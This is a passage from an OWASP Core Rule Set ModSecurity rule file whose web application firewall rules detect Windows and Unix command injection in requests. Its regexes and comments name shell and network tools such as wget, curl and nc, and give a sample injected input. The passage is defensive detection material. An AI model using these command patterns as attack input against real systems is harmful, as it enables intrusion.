]*q[\"\^]*
r[\"\^]*y|p[\"\^]*d)|r[\"\^]*(?:i[\"\^]*n[\"\^]*t[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|b[\"\^]*r[\"\^]*m)|n[\"\^]*(?:c[\"\^]*n[\"\^]*f[\"\^]*g|m[\"\^]*n[\"\^]*g[\"\^]*r)|o[\"\^]*m[\"\^]*p[\"\^]*t)|a[\"\^]*t[\"\^]*h[\"\^]*(?:p[\"\^]*i[\"\^]*n[\"\^]*g|(?:[\s,;]|\.|/|<|>).*)|e[\"\^]*r[\"\^]*(?:l(?:[\"\^]*(?:s[\"\^]*h|5))?|f[\"\^]*m[\"\^]*o[\"\^]*n)|y[\"\^]*t[\"\^]*h[\"\^]*o[\"\^]*n(?:[\"\^]*(?:3(?:[\"\^]*m)?|2))?|k[\"\^]*g[\"\^]*m[\"\^]*g[\"\^]*r|h[\"\^]*p(?:[\"\^]*[57])?|u[\"\^]*s[\"\^]*h[\"\^]*d|i[\"\^]*n[\"\^]*g)|r[\"\^]*(?:e[\"\^]*(?:(?:p[\"\^]*l[\"\^]*a[\"\^]*c[\"\^]*e|n(?:[\"\^]*a[\"\^]*m[\"\^]*e)?|s[\"\^]*e[\"\^]*t)[\"\^]*(?:[\s,;]|\.|/|<|>).*|g[\"\^]*(?:s[\"\^]*v[\"\^]*r[\"\^]*3[\"\^]*2|e[\"\^]*d[\"\^]*i[\"\^]*t|(?:[\s,;]|\.|/|<|>).*|i[\"\^]*n[\"\^]*i)|c[\"\^]*(?:d[\"\^]*i[\"\^]*s[\"\^]*c|o[\"\^]*v[\"\^]*e[\"\^]*r)|k[\"\^]*e[\"\^]*y[\"\^]*w[\"\^]*i[\"\^]*z)|u[\"\^]*(?:n[\"\^]*(?:d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|a[\"\^]*s)|b[\"\^]*y[\"\^]*(?:1(?:[\"\^]*[89])?|2[\"\^]*[012]))|a[\"\^]*(?:s[\"\^]*(?:p[\"\^]*h[\"\^]*o[\"\^]*n[\"\^]*e|d[\"\^]*i[\"\^]*a[\"\^]*l)|r[\"\^]*(?:[\s,;]|\.|/|<|>).*)|m[\"\^]*(?:(?:d[\"\^]*i[\"\^]*r[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|t[\"\^]*s[\"\^]*h[\"\^]*a[\"\^]*r[\"\^]*e)|o[\"\^]*(?:u[\"\^]*t[\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*|b[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y)|s[\"\^]*(?:t[\"\^]*r[\"\^]*u[\"\^]*i|y[\"\^]*n[\"\^]*c)|d[\"\^]*(?:[\s,;]|\.|/|<|>).*)|t[\"\^]*(?:a[\"\^]*(?:s[\"\^]*k[\"\^]*(?:k[\"\^]*i[\"\^]*l[\"\^]*l|l[\"\^]*i[\"\^]*s[\"\^]*t|s[\"\^]*c[\"\^]*h[\"\^]*d|m[\"\^]*g[\"\^]*r)|k[\"\^]*e[\"\^]*o[\"\^]*w[\"\^]*n)|(?:i[\"\^]*m[\"\^]*e[\"\^]*o[\"\^]*u|p[\"\^]*m[\"\^]*i[\"\^]*n[\"\^]*i|e[\"\^]*l[\"\^]*n[\"\^]*e|l[\"\^]*i[\"\^]*s)[\"\^]*t|s[\"\^]*(?:d[\"\^]*i[\"\^]*s[\"\^]*c[\"\^]*o|s[\"\^]*h[\"\^]*u[\"\^]*t[\"\^]*d)[\"\^]*n|y[\"\^]*p[\"\^]*e[\"\^]*(?:p[\"\^]*e[\"\^]*r[\"\^]*f|(?:[\s,;]|\.|/|<|>).*)|r[\"\^]*(?:a[\"\^]*c[\"\^]*e[\"\^]*r[\"\^]*t|e[\"\^]*e))|w[\"\^]*(?:i[\"\^]*n[\"\^]*(?:d[\"\^]*i[\"\^]*f[\"\^]*f|m[\"\^]*s[\"\^]*d[\"\^]*p|v[\"\
^]*a[\"\^]*r|r[\"\^]*[ms])|u[\"\^]*(?:a[\"\^]*(?:u[\"\^]*c[\"\^]*l[\"\^]*t|p[\"\^]*p)|s[\"\^]*a)|s[\"\^]*c[\"\^]*(?:r[\"\^]*i[\"\^]*p[\"\^]*t|u[\"\^]*i)|e[\"\^]*v[\"\^]*t[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|m[\"\^]*i[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|c)|a[\"\^]*i[\"\^]*t[\"\^]*f[\"\^]*o[\"\^]*r|h[\"\^]*o[\"\^]*a[\"\^]*m[\"\^]*i|g[\"\^]*e[\"\^]*t)|u[\"\^]*(?:s[\"\^]*(?:e[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*c[\"\^]*o[\"\^]*u[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*t[\"\^]*r[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*t[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s|r[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|n[\"\^]*(?:r[\"\^]*a[\"\^]*r|z[\"\^]*i[\"\^]*p))|q[\"\^]*(?:u[\"\^]*e[\"\^]*r[\"\^]*y[\"\^]*(?:[\s,;]|\.|/|<|>).*|p[\"\^]*r[\"\^]*o[\"\^]*c[\"\^]*e[\"\^]*s[\"\^]*s|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a|g[\"\^]*r[\"\^]*e[\"\^]*p)|o[\"\^]*(?:d[\"\^]*b[\"\^]*c[\"\^]*(?:a[\"\^]*d[\"\^]*3[\"\^]*2|c[\"\^]*o[\"\^]*n[\"\^]*f)|p[\"\^]*e[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)|v[\"\^]*(?:o[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*y)|x[\"\^]*c[\"\^]*(?:a[\"\^]*c[\"\^]*l[\"\^]*s|o[\"\^]*p[\"\^]*y)|z[\"\^]*i[\"\^]*p[\"\^]*(?:[\s,;]|\.|/|<|>).*)(?:\.[\"\^]*\w+)?\b" \ "id:932115,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Remote Command Execution: Windows Command Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-windows',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ Windows PowerShell, cmdlets and options ] # # Detect some common PowerShell commands, cmdlets and options. # These commands should be relatively uncommon in normal text, but # potentially useful for code injection. 
#
# If you are not running Windows, it is safe to disable this rule.
# NOTE(review): read "not running Windows" as covering every backend this
# WAF protects, not only the host ModSecurity runs on; a Windows
# application server behind a Unix reverse proxy still needs this rule.
# The rule carries tag 'platform-windows', so it can be removed after the
# rule set is loaded (SecRuleRemoveById / SecRuleRemoveByTag) instead of
# editing this file.
#
# https://technet.microsoft.com/en-us/magazine/ff714569.aspx
# https://msdn.microsoft.com/en-us/powershell/scripting/core-powershell/console/powershell.exe-command-line-help
#
# How the rule works:
# - @pmFromFile phrase-matches each inspected value against the entries
#   of windows-powershell-commands.data.
# - Inspected: cookie values (except cookies whose name matches /__utm/),
#   cookie names, argument names and values, and XML:/*.
# - t:urlDecodeUni, t:cmdLine and t:lowercase are applied to the value
#   before matching.
# - 'block' leaves the disruptive action to the SecDefaultAction in
#   effect; on a match the rule adds tx.critical_anomaly_score to
#   tx.rce_score and tx.anomaly_score_pl1.
# - logdata records %{MATCHED_VAR} and the inspected variables include
#   cookies, so alerts for this rule can contain session tokens or other
#   secrets. ctl:auditLogParts=+E additionally adds audit log part E to
#   the record. Restrict access to these logs accordingly.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile windows-powershell-commands.data" \
    "id:932120,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,t:cmdLine,t:lowercase,\
    msg:'Remote Command Execution: Windows PowerShell Command Found',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-shell',\
    tag:'language-powershell',\
    tag:'platform-windows',\
    tag:'attack-rce',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/248/88',\
    tag:'PCI/6.5.2',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

# [ Unix shell expressions ]
#
# Detects the following patterns which are common in Unix shell scripts
# and one-liners:
#
# $(foo)    Command substitution
# ${foo}    Parameter expansion
# <(foo)    Process substitution
# >(foo)    Process substitution
# $((foo))  Arithmetic expansion
#
# Regexp generated from util/regexp-assemble/regexp-932130.data using Regexp::Assemble.
# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage.
#
# Rule 932130 notes:
# - The pattern is unanchored and uses greedy '.*', so any inspected value
#   that contains '$(' ... ')', '${' ... '}', '<(' ... ')' or '>(' ... ')'
#   matches, whatever surrounds it.
# - Legitimate input that carries '${name}'-style placeholders will
#   therefore match as well; handle such false positives with an exclusion
#   scoped to the affected parameter rather than by removing the rule.
# - t:urlDecodeUni and t:cmdLine are applied to the value before matching.
# - On a match the rule adds tx.critical_anomaly_score to tx.rce_score and
#   tx.anomaly_score_pl1; 'block' leaves the disruptive action to the
#   SecDefaultAction in effect.
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\$(?:\((?:\(.*\)|.*)\)|\{.*\})|[<>]\(.*\))" \
    "id:932130,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,t:cmdLine,\
    msg:'Remote Command Execution: Unix Shell Expression Found',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-shell',\
    tag:'platform-unix',\
    tag:'attack-rce',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/248/88',\
    tag:'PCI/6.5.2',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

# [ Windows FOR, IF commands ]
#
# This rule detects Windows command shell FOR and IF commands.
# If you are not running Windows, it is safe to disable this rule.
#
# Examples:
#
#   FOR %a IN (set) DO
#   FOR /D %a IN (dirs) DO
#   FOR /F "options" %a IN (text|"text") DO
#   FOR /L %a IN (start,step,end) DO
#   FOR /R C:\dir %A IN (set) DO
#
#   IF [/I] [NOT] EXIST filename | DEFINED define | ERRORLEVEL n | CMDEXTVERSION n
#   IF [/I] [NOT] item1 [==|EQU|NEQ|LSS|LEQ|GTR|GEQ] item2
#   IF [/I] [NOT] (item1) [==|EQU|NEQ|LSS|LEQ|GTR|GEQ] (item2)
#
# http://ss64.com/nt/if.html
# http://ss64.com/nt/for.html
#
# Regexp generated from util/regexp-assemble/regexp-932140.data using Regexp::Assemble.
# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage.
#
# The regexp is written against the output of t:cmdLine, which lowercases
# the value and deletes spaces before '/' and '('. That is why the keywords
# are lowercase and the pattern expects 'if/i', 'for/d' and 'in(' with no
# space, although the examples above are written with one.
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \b(?:if(?:/i)?(?: not)?(?: exist\b| defined\b| errorlevel\b| cmdextversion\b|(?: |\().*(?:\bgeq\b|\bequ\b|\bneq\b|\bleq\b|\bgtr\b|\blss\b|==))|for(?:/[dflr].*)? %+[^ ]+ in\(.*\)\s?do)" \
    "id:932140,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,t:cmdLine,\
    msg:'Remote Command Execution: Windows FOR/IF Command Found',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-shell',\
    tag:'platform-windows',\
    tag:'attack-rce',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/248/88',\
    tag:'PCI/6.5.2',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

# [ Unix direct remote command execution ]
#
# Detects Unix commands at the start of a parameter (direct RCE).
# Example: foo=wget%20www.example.com
#
# This case is different from command injection (rule 932100), where a
# command string is appended (injected) to a regular parameter, and then
# passed to a shell unescaped.
#
# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit:
# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ]
#
# Due to a higher risk of false positives, the following changes have been
# made relative to rule 932100:
# 1) the set of commands is smaller
# 2) we require a trailing space (denoting command parameters) or command
#    separator character after the command
#
# To rebuild the word list regexp:
#   cd util/regexp-assemble
#   cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl
#
# Then insert the assembled regexp into this template:
#
# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:^|=)\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*
#   [regexp assembled from util/regexp-assemble/regexp-932150.txt]
#   [\\\\'\"]*(?:\s|;|\||&|<|>)" \
#
SecRule 
REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:^|=)\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:l[\\\\'\"]*(?:s(?:[\\\\'\"]*(?:b[\\\\'\"]*_[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*e|c[\\\\'\"]*p[\\\\'\"]*u|m[\\\\'\"]*o[\\\\'\"]*d|p[\\\\'\"]*c[\\\\'\"]*i|u[\\\\'\"]*s[\\\\'\"]*b|-[\\\\'\"]*F|o[\\\\'\"]*f))?|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|m[\\\\'\"]*(?:o[\\\\'\"]*r[\\\\'\"]*e|a)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s)|e[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*(?:(?:f[\\\\'\"]*i[\\\\'\"]*l|p[\\\\'\"]*i[\\\\'\"]*p)[\\\\'\"]*e|e[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*o)|a[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*g(?:[\\\\'\"]*i[\\\\'\"]*n)?|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*m)|w[\\\\'\"]*p(?:[\\\\'\"]*-[\\\\'\"]*d[\\\\'\"]*o[\\\\'\"]*w[\\\\'\"]*n[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*d)?|f[\\\\'\"]*t[\\\\'\"]*p(?:[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t)?|y[\\\\'\"]*n[\\\\'\"]*x)|s[\\\\'\"]*(?:e[\\\\'\"]*(?:t[\\\\'\"]*(?:e[\\\\'\"]*n[\\\\'\"]*v|s[\\\\'\"]*i[\\\\'\"]*d)|n[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*i[\\\\'\"]*l|d)|h(?:[\\\\'\"]*\.[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*b)?|o[\\\\'\"]*(?:u[\\\\'\"]*r[\\\\'\"]*c[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t)|t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g[\\\\'\"]*s|y[\\\\'\"]*s[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*l|c[\\\\'\"]*(?:h[\\\\'\"]*e[\\\\'\"]*d|p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|f[\\\\'\"]*t[\\\\'\"]*p|u[\\\\'\"]*d[\\\\'\"]*o|s[\\\\'\"]*h|v[\\\\'\"]*n)|p[\\\\'\"]*(?:t[\\\\'\"]*a[\\\\'\"]*r(?:[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p))?|y[\\\\'\"]*t[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*n(?:[\\\\'\"]*(?:3(?:[\\\\'\"]*m)?|2))?|k[\\\\'\"]*(?:e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c|
i[\\\\'\"]*l[\\\\'\"]*l)|r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*v|(?:g[\\\\'\"]*r[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|e[\\\\'\"]*r[\\\\'\"]*l(?:[\\\\'\"]*5)?|h[\\\\'\"]*p(?:[\\\\'\"]*[57])?|i[\\\\'\"]*n[\\\\'\"]*g|o[\\\\'\"]*p[\\\\'\"]*d)|n[\\\\'\"]*(?:c(?:[\\\\'\"]*(?:\.[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*l|o[\\\\'\"]*p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*d)|a[\\\\'\"]*t))?|e[\\\\'\"]*t[\\\\'\"]*(?:k[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*f[\\\\'\"]*t[\\\\'\"]*p|(?:s[\\\\'\"]*t|c)[\\\\'\"]*a[\\\\'\"]*t)|o[\\\\'\"]*h[\\\\'\"]*u[\\\\'\"]*p|p[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g|s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t)|t[\\\\'\"]*(?:c[\\\\'\"]*(?:p[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|i[\\\\'\"]*n[\\\\'\"]*g)|s[\\\\'\"]*h)|r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e(?:[\\\\'\"]*6)?|i[\\\\'\"]*m[\\\\'\"]*e(?:[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t)?|a[\\\\'\"]*(?:i[\\\\'\"]*l(?:[\\\\'\"]*f)?|r)|e[\\\\'\"]*l[\\\\'\"]*n[\\\\'\"]*e[\\\\'\"]*t)|r[\\\\'\"]*(?:e[\\\\'\"]*(?:p[\\\\'\"]*(?:l[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e|e[\\\\'\"]*a[\\\\'\"]*t)|a[\\\\'\"]*l[\\\\'\"]*p[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*h|n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)|u[\\\\'\"]*b[\\\\'\"]*y(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|m[\\\\'\"]*(?:u[\\\\'\"]*s[\\\\'\"]*e|d[\\\\'\"]*i)[\\\\'\"]*r|n[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*o|s[\\\\'\"]*y[\\\\'\"]*n[\\\\'\"]*c|c[\\\\'\"]*p)|b[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t)|s[\\\\'\"]*d[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*f[\\\\'\"]*f|t[\\\\'\"]*a[\\\\'\"]*r)|u[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*n|a[\\\\'\"]*s[\\\\'
\"]*h)|m[\\\\'\"]*(?:y[\\\\'\"]*s[\\\\'\"]*q[\\\\'\"]*l[\\\\'\"]*(?:d[\\\\'\"]*u[\\\\'\"]*m[\\\\'\"]*p(?:[\\\\'\"]*s[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*w)?|h[\\\\'\"]*o[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*p[\\\\'\"]*y|a[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*n|s[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*w)|l[\\\\'\"]*o[\\\\'\"]*c[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e|a[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*q)|u[\\\\'\"]*(?:n[\\\\'\"]*(?:c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|l[\\\\'\"]*z[\\\\'\"]*m[\\\\'\"]*a|a[\\\\'\"]*m[\\\\'\"]*e|r[\\\\'\"]*a[\\\\'\"]*r|s[\\\\'\"]*e[\\\\'\"]*t|z[\\\\'\"]*i[\\\\'\"]*p|x[\\\\'\"]*z)|s[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*(?:(?:a[\\\\'\"]*d|m[\\\\'\"]*o)[\\\\'\"]*d|d[\\\\'\"]*e[\\\\'\"]*l))|x[\\\\'\"]*(?:z(?:[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*(?:i[\\\\'\"]*f[\\\\'\"]*f|e[\\\\'\"]*c)|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e))?|a[\\\\'\"]*r[\\\\'\"]*g[\\\\'\"]*s)|z[\\\\'\"]*(?:(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e|i)[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|r[\\\\'\"]*u[\\\\'\"]*n|s[\\\\'\"]*h)|f[\\\\'\"]*(?:t[\\\\'\"]*p[\\\\'\"]*(?:s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*s|w[\\\\'\"]*h[\\\\'\"]*o)|i[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*t[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|e[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*h|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p)|c[\\\\'\"]*(?:o[\\\\'\"]*(?:m[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*d|p[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*c)|u[\\\\'\"]*r[\\\\'\"]*l|s[\\\\'\"]*h|c)|e[\\\\'\"]*(?:g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*h[\\\\'\"]*o|v[\\\\'\"]*a[\\\\'\"]*l|x[\\\\'\"]*e[\\\\'\"]*c|n[\\\\'\"]*v)|d[\\\\'\"]*(?:m[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*g|a[\\\\'\"]*s[\\\\'\"]*h|i[\\\\'\"]*f[\\\\'\"]*f|o[\\\\'\"]*a[\\\\'\"]*s)|g[\\\\'\"]*(?:z[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]
*t|i[\\\\'\"]*p)|r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*c)|j[\\\\'\"]*(?:o[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*\s+[\\\\'\"]*-[\\\\'\"]*x|a[\\\\'\"]*v[\\\\'\"]*a)|w[\\\\'\"]*(?:h[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*i|g[\\\\'\"]*e[\\\\'\"]*t|3[\\\\'\"]*m)|i[\\\\'\"]*r[\\\\'\"]*b(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|o[\\\\'\"]*n[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*r|h[\\\\'\"]*(?:e[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*p)|v[\\\\'\"]*i[\\\\'\"]*(?:g[\\\\'\"]*r|p[\\\\'\"]*w)|G[\\\\'\"]*E[\\\\'\"]*T)[\\\\'\"]*(?:\s|;|\||&|<|>)" \ "id:932150,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Remote Command Execution: Direct Unix Command Execution',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-unix',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ Unix shell snippets ] # # Detect some common sequences found in shell commands and scripts. # # Some commands which were restricted in earlier rules due to FP, # have been added here with their full path, in order to catch some # cases where the full path is sent. 
#
# This rule is also triggered by an Apache Struts Remote Code Execution exploit:
# [ Apache Struts vulnerability CVE-2017-9805 - Exploit tested: https://www.exploit-db.com/exploits/42627 ]
#
# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit:
# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ]
#
# Rule 932160 is a phrase match (@pmFromFile) against the word list in
# unix-shell.data. It inspects cookie values (except cookies whose name
# matches /__utm/), cookie names, argument names and values, and XML content.
# The transformations run in the listed order (urlDecodeUni, cmdLine,
# normalizePath, lowercase), so the phrase match only ever sees the
# normalised value. A match adds the critical anomaly score to tx.rce_score
# and to tx.anomaly_score_pl1.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile unix-shell.data" \
    "id:932160,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,t:cmdLine,t:normalizePath,t:lowercase,\
    msg:'Remote Command Execution: Unix Shell Code Found',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-shell',\
    tag:'platform-unix',\
    tag:'attack-rce',\
